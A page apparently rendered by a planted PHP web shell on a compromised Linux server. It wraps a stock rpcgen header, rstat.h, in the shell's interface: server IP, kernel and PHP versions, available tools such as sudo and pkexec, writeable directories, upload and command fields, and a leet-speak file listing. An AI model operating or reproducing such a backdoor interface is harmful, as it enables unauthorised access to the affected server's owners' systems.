p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.216.202
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/include/rpcsvc/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/include/rpcsvc/rstat.h
/*
 * Please do not edit this file.
 * It was generated using rpcgen.
 */

#ifndef _RSTAT_H_RPCGEN
#define _RSTAT_H_RPCGEN

#include <rpc/rpc.h>


#ifdef __cplusplus
extern "C" {
#endif

#ifndef FSCALE
/*
 * Scale factor for scaled integers used to count load averages.
 */
#define FSHIFT 8 /* bits to right of fixed binary point */
#define FSCALE (1<<FSHIFT)

#endif /* ndef FSCALE */
#define CPUSTATES 4
#define DK_NDRIVE 4

struct rstat_timeval {
	u_int tv_sec;
	u_int tv_usec;
};
typedef struct rstat_timeval rstat_timeval;

struct statstime {
	int cp_time[CPUSTATES];
	int dk_xfer[DK_NDRIVE];
	u_int v_pgpgin;
	u_int v_pgpgout;
	u_int v_pswpin;
	u_int v_pswpout;
	u_int v_intr;
	int if_ipackets;
	int if_ierrors;
	int if_oerrors;
	int if_collisions;
	u_int v_swtch;
	int avenrun[3];
	rstat_timeval boottime;
	rstat_timeval curtime;
	int if_opackets;
};
typedef struct statstime statstime;

struct statsswtch {
	int cp_time[CPUSTATES];
	int dk_xfer[DK_NDRIVE];
	u_int v_pgpgin;
	u_int v_pgpgout;
	u_int v_pswpin;
	u_int v_pswpout;
	u_int v_intr;
	int if_ipackets;
	int if_ierrors;
	int if_oerrors;
	int if_collisions;
	u_int v_swtch;
	u_int avenrun[3];
	rstat_timeval boottime;
	int if_opackets;
};
typedef struct statsswtch statsswtch;

struct stats {
	int cp_time[CPUSTATES];
	int dk_xfer[DK_NDRIVE];
	u_int v_pgpgin;
	u_int v_pgpgout;
	u_int v_pswpin;
	u_int v_pswpout;
	u_int v_intr;
	int if_ipackets;
	int if_ierrors;
	int if_oerrors;
	int if_collisions;
	int if_opackets;
};
typedef struct stats stats;

#define RSTATPROG 100001
#define RSTATVERS_TIME 3

#if defined(__STDC__) || defined(__cplusplus)
#define RSTATPROC_STATS 1
extern  statstime * rstatproc_stats_3(void *, CLIENT *);
extern  statstime * rstatproc_stats_3_svc(void *, struct svc_req *);
#define RSTATPROC_HAVEDISK 2
extern  u_int * rstatproc_havedisk_3(void *, CLIENT *);
extern  u_int * rstatproc_havedisk_3_svc(void *, struct svc_req *);
extern int rstatprog_3_freeresult (SVCXPRT *, xdrproc_t, caddr_t);

#else /* K&R C */
#define RSTATPROC_STATS 1
extern  statstime * rstatproc_stats_3();
extern  statstime * rstatproc_stats_3_svc();
#define RSTATPROC_HAVEDISK 2
extern  u_int * rstatproc_havedisk_3();
extern  u_int * rstatproc_havedisk_3_svc();
extern int rstatprog_3_freeresult ();
#endif /* K&R C */
#define RSTATVERS_SWTCH 2

#if defined(__STDC__) || defined(__cplusplus)
extern  statsswtch * rstatproc_stats_2(void *, CLIENT *);
extern  statsswtch * rstatproc_stats_2_svc(void *, struct svc_req *);
extern  u_int * rstatproc_havedisk_2(void *, CLIENT *);
extern  u_int * rstatproc_havedisk_2_svc(void *, struct svc_req *);
extern int rstatprog_2_freeresult (SVCXPRT *, xdrproc_t, caddr_t);

#else /* K&R C */
extern  statsswtch * rstatproc_stats_2();
extern  statsswtch * rstatproc_stats_2_svc();
extern  u_int * rstatproc_havedisk_2();
extern  u_int * rstatproc_havedisk_2_svc();
extern int rstatprog_2_freeresult ();
#endif /* K&R C */
#define RSTATVERS_ORIG 1

#if defined(__STDC__) || defined(__cplusplus)
extern  stats * rstatproc_stats_1(void *, CLIENT *);
extern  stats * rstatproc_stats_1_svc(void *, struct svc_req *);
extern  u_int * rstatproc_havedisk_1(void *, CLIENT *);
extern  u_int * rstatproc_havedisk_1_svc(void *, struct svc_req *);
extern int rstatprog_1_freeresult (SVCXPRT *, xdrproc_t, caddr_t);

#else /* K&R C */
extern  stats * rstatproc_stats_1();
extern  stats * rstatproc_stats_1_svc();
extern  u_int * rstatproc_havedisk_1();
extern  u_int * rstatproc_havedisk_1_svc();
extern int rstatprog_1_freeresult ();
#endif /* K&R C */

/* the xdr functions */

#if defined(__STDC__) || defined(__cplusplus)
extern  bool_t xdr_rstat_timeval (XDR *, rstat_timeval*);
extern  bool_t xdr_statstime (XDR *, statstime*);
extern  bool_t xdr_statsswtch (XDR *, statsswtch*);
extern  bool_t xdr_stats (XDR *, stats*);

#else /* K&R C */
extern bool_t xdr_rstat_timeval ();
extern bool_t xdr_statstime ();
extern bool_t xdr_statsswtch ();
extern bool_t xdr_stats ();

#endif /* K&R C */

#ifdef __cplusplus
}
#endif

#endif /* !_RSTAT_H_RPCGEN */
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
September 29 2025 07:00:20
0 / 0
0755
bootparam.h
0.89 KB
June 04 2024 14:43:47
0 / 0
0644
bootparam_prot.h
3.113 KB
June 04 2024 14:43:47
0 / 0
0644
bootparam_prot.x
3.047 KB
June 04 2024 14:43:47
0 / 0
0644
key_prot.h
6.599 KB
June 04 2024 14:43:47
0 / 0
0644
key_prot.x
6.414 KB
June 04 2024 14:43:47
0 / 0
0644
klm_prot.h
3.213 KB
June 04 2024 14:43:47
0 / 0
0644
klm_prot.x
3.653 KB
June 04 2024 14:43:47
0 / 0
0644
mount.h
3.772 KB
June 04 2024 14:43:47
0 / 0
0644
mount.x
4.556 KB
June 04 2024 14:43:47
0 / 0
0644
nfs_prot.h
11.18 KB
June 04 2024 14:43:47
0 / 0
0644
nfs_prot.x
7.799 KB
June 04 2024 14:43:47
0 / 0
0644
nis.h
15.83 KB
June 04 2024 14:43:48
0 / 0
0644
nis.x
16.408 KB
June 04 2024 14:43:48
0 / 0
0644
nis_callback.h
2.641 KB
June 04 2024 14:43:48
0 / 0
0644
nis_callback.x
2.127 KB
June 04 2024 14:43:48
0 / 0
0644
nis_object.x
12.783 KB
June 04 2024 14:43:48
0 / 0
0644
nis_tags.h
5.244 KB
June 04 2024 14:43:48
0 / 0
0644
nislib.h
12.687 KB
June 04 2024 14:43:48
0 / 0
0644
nlm_prot.h
9.154 KB
June 04 2024 14:43:47
0 / 0
0644
nlm_prot.x
4.873 KB
June 04 2024 14:43:47
0 / 0
0644
rex.h
5.129 KB
June 04 2024 14:43:47
0 / 0
0644
rex.x
7.248 KB
June 04 2024 14:43:47
0 / 0
0644
rstat.h
3.95 KB
June 04 2024 14:43:47
0 / 0
0644
rstat.x
3.907 KB
June 04 2024 14:43:47
0 / 0
0644
rusers.h
3.202 KB
June 04 2024 14:43:47
0 / 0
0644
rusers.x
5.729 KB
June 04 2024 14:43:47
0 / 0
0644
sm_inter.h
3.099 KB
June 04 2024 14:43:47
0 / 0
0644
sm_inter.x
3.664 KB
June 04 2024 14:43:47
0 / 0
0644
spray.h
1.843 KB
June 04 2024 14:43:47
0 / 0
0644
spray.x
2.483 KB
June 04 2024 14:43:47
0 / 0
0644
yp.h
9.684 KB
June 04 2024 14:43:48
0 / 0
0644
yp.x
7.029 KB
June 04 2024 14:43:48
0 / 0
0644
yp_prot.h
10.253 KB
June 04 2024 14:43:48
0 / 0
0644
ypclnt.h
3.515 KB
June 04 2024 14:43:48
0 / 0
0644
yppasswd.h
1.255 KB
June 04 2024 14:43:47
0 / 0
0644
yppasswd.x
2.232 KB
June 04 2024 14:43:47
0 / 0
0644
ypupd.h
2.937 KB
June 04 2024 14:43:48
0 / 0
0644